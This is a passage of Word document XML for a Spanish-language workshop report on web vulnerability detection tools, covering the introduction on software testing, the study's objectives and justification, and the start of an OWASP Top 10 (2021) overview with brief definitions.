              <w:instrText xml:space="preserve"> PAGEREF _Toc196776214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61ACAEDB" w14:textId="7D9B6132" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776215" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ANEXOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776215 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="602A5263" w14:textId="38BD03CA" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="0031097F">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7D561EEB" w14:textId="40D59DF5" w:rsidR="00A50622" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc196776191"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCCIÓN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5E19A8C1" w14:textId="196BCB68" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16"/>
    <w:p w14:paraId="6853E2E4" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Las pruebas son el único instrumento que puede determinar la calidad de un producto software, es decir, es el único método por el que se puede asegurar que un sistema software cumple con los requerimientos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7534343E" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se puede determinar una dependencia directa entre la calidad de un sistema y el valor del mismo, por lo tanto, las pruebas dotan de valor a los productos software. Se estima que el coste de las pruebas, en un desarrollo comercial básico, puede suponer entre un 50% y un 75% del coste total del proyecto. Pero, ¿Si son tan caras por qué deben aplicarse? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5328B" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Aunque a efectos totales las pruebas suponen un coste importante, tanto en tiempo como en recursos asociados, aplicarlas reduce todos los demás costes, es decir, los costes de desarrollo, implementación y mantenimiento se ven enormemente reducidos al tener un sistema probado. Al mismo tiempo las pruebas sirven como documentos, contratos, que aseguran el funcionamiento del sistema dotándolo de una fiabilidad probada. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3100CC" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Pero no sólo hay que aplicar pruebas a un producto software, hay que hacerlo de una manera controlada y correcta. El uso inadecuado de pruebas tiene como consecuencia: baja calidad, aumento de los costes de desarrollo, retraso en la comercialización/publicación, aumento de los costes de transacciones mercantiles, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57671FB5" w14:textId="079B2BA8" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para probar de una forma correcta los productos software surgen diferentes metodologías a lo largo del tiempo. Metodologías que se adaptan evolucionando de forma paralela con la Ingeniería del software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E67876" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRDefault="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819FA11" w14:textId="6C24147E" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc196776192"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PERFIL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3F331B44" w14:textId="3D5236CB" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc196776193"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PROBLEMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="160CDB7F" w14:textId="31634A19" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conocer las diversas herramientas para detectar vulnerabilidad en aplicaciones web. La diversidad de tecnologías y plataformas utilizadas en el desarrollo web plantea desafíos significativos en términos de seguridad. Las aplicaciones web deben ser capaces de adaptarse a diferentes entornos y configuraciones sin comprometer su integridad. Para hacer frente a esta complejidad, es necesario contar con herramientas de detección de vulnerabilidades que sean flexibles y capaces de adaptarse a una amplia variedad de tecnologías y frameworks. Este estudio tiene como objetivo evaluar las herramientas de detección de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E5DD9" w14:textId="6042099A" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc196776194"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OBJETIVO GENERAL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="60773A93" w14:textId="07A06195" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizar, dar a conocer las herramientas para la detección de vulnerabilidad en la web y desarrollar un software para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">probar </w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vulnerabilidad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC4162" w14:textId="3CC71B1E" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc196776195"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OBJETIVOS ESPECIFICOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0314BA37" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Investigar las herramientas para la detección de vulnerabilidad en web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D388AB9" w14:textId="24D0647E" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Investigar los tipos de vulnerabilidad más comunes en la web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2EC4A3" w14:textId="2F836AA1" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Investigar cómo usar las herramientas para la detección de vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6811B6" w14:textId="1226B856" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Analizar los tipos de vulnerabilidad.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A67D2" w14:textId="1736D07D" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc196776196"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>JUSTIFICACION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2CE9124B" w14:textId="639A70A5" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La prevención es la mejor defensa contra los ciberataques. Al aprender a utilizar herramientas de detección de vulnerabilidades, podrán identificar y corregir los problemas de seguridad en sus aplicaciones web antes de que sean explotados por atacantes. En el taller les proporcionaremos los conocimientos y las habilidades necesarias para llevar a cabo evaluaciones de seguridad exhaustivas y garantizar la protección de sus datos en sus futuros proyectos que realicen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E05B89" w14:textId="58245855" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055D8C40" w14:textId="70DA1EC8" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADBCCF3" w14:textId="5D526E80" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6617D1" w14:textId="6DAC754E" w:rsidR="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EFBF18" w14:textId="10CF4D22" w:rsidR="008C7F16" w:rsidRPr="00440C91" w:rsidRDefault="008C7F16" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc196776197"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FUNDAMENTACION TEORICA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="21CCF1DD" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="203"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la era digital actual, las aplicaciones web se han convertido en componentes críticos de la infraestructura tecnológica empresarial y gubernamental. Según Gartner (2023), el 78% de las organizaciones a nivel mundial dependen de aplicaciones web para operaciones comerciales críticas, lo que ha incrementado considerablemente la superficie de ataque para actores maliciosos. La seguridad de estas aplicaciones es, por tanto, un aspecto fundamental que requiere constante atención y actualización de conocimientos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6777B6" w14:textId="7BCEBE88" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="307"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esta fundamentación teórica aborda las principales vulnerabilidades en aplicaciones web, con especial énfasis en SQL Injection, Cross-Site Scripting (XSS) y consideraciones sobre pruebas de carga con usuarios simultáneos. Adicionalmente, se presenta un análisis del OWASP Top 10, un estándar de referencia sobre las vulnerabilidades más críticas y frecuentes en entornos web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570558D" w14:textId="123E0EEF" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc196776198"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PANORAMA ACTUAL DE LAS VULNERABILIDADES WEB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="232878EF" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="218"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Open Web Application Security Project (OWASP) publica periódicamente una lista de las diez vulnerabilidades más críticas en aplicaciones web. Esta lista, conocida como "OWASP Top 10", constituye un estándar de facto en la industria de seguridad informática y sirve como guía para desarrolladores y profesionales de seguridad (OWASP Foundation, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4321A" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La versión más reciente del OWASP Top 10 (2021) incluye las siguientes vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F30203" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Fallos en las restricciones sobre qué usuarios autenticados pueden hacer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0FC84" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="84" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Deficiencias en la implementación de cifrado que pueden exponer datos sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29041C1C" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Incluye SQL, NoSQL, OS y LDAP injection, entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB734F1" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Insecure Design</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Fallos en el diseño y arquitectura que no pueden ser corregidos simplemente con una implementación correcta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876C211" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Configuraciones de seguridad incorrectas, incompletas o ad-hoc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFC8B7" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vulnerable and Outdated Components</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Uso de componentes con vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3D358" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identification and Authentication Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Confirmación incorrecta de la identidad del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FC004" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Software and Data Integrity Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Fallos relacionados con la integridad del código y los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C64C9F" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Security Logging and Monitoring Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Detección, respuesta y análisis de brechas insuficiente.</w:t>
      </w:r>
    </w:p>
